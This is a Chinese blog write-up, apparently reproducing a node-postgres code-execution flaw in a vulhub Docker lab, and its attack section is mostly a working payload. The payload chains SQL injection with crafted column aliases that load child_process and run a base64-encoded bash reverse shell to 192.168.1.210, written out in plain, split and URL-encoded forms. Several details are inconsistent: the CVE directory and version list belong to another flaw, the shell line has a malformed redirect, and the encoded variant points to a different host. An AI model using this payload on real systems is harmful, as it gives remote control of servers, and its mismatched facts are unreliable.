漏洞描述
node-postgres在处理类型为Row Description的postgres返回包时,将字段名拼接到代码中。由于没有进行合理转义,导致一个特殊构造的字段名可逃逸出代码单引号限制,造成代码执行漏洞。
受影响版本:
Node.js 8.5.0 + Express 3.19.0-3.21.2
Node.js 8.5.0 + Express 4.11.0-4.15.5
kali 环境配置
安装https协议、CA证书、dirmngr
apt-get update
apt-get install -y apt-transport-https ca-certificates
apt-get install dirmngr
添加GPG密钥并添加更新源
curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -
echo ‘deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable’ | sudo tee /etc/apt/sources.list.d/docker.list
系统更新以及安装docker
apt-get update&&apt install docker-ce
启动docker服务器 和compose
service docker start || apt install docker-compose
下载安装vulhub
git clone https://github.com/vulhub/vulhub.git
漏洞复现
启动环境/vulhub-master/node/CVE-2017-14849]
docker-compose build
docker-compose up -d
初始化完成后 访问 ip:端口号,进行抓包
采用sqlmap工具,根据id=1 SQL注入,数据库back-end DBMS: PostgreSQL
执行命令poc
bash -i >& /dev/tcp/192.168.1.210/78960>&1
base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjEwLzc4OTYgMD4mMQ==
截断
SELECT 1 AS "\']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3Rj`+/*", 4 AS "*/`cC8xOTIuMTY4LjEuMjEwLzc4OTYgMD4mMQ==|base64 -d|bash`)//"
url编码
SELECT%201%20AS%20%22%5C'%5D=0;require=process.mainModule.constructor._load;/*%22,%202%20AS%20%22*/p=require(%60child_process%60);/*%22,%203%20AS%20%22*/p.exec(%60echo%20YmFzaCAtaSA+JiAvZGV2L3Rj%60+/*%22,%204%20AS%20%22*/%60cC8xOTIuMTY4LjIuMTMwLzk5OTkgMD4mMQ==%7Cbase64%20-d%7Cbash%60)//%22
反弹shell
参考链接
https://blog.csdn.net/gaomei2009/article/details/125910094
https://security.tencent.com/index.php/blog/msg/121
扫一扫
625
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
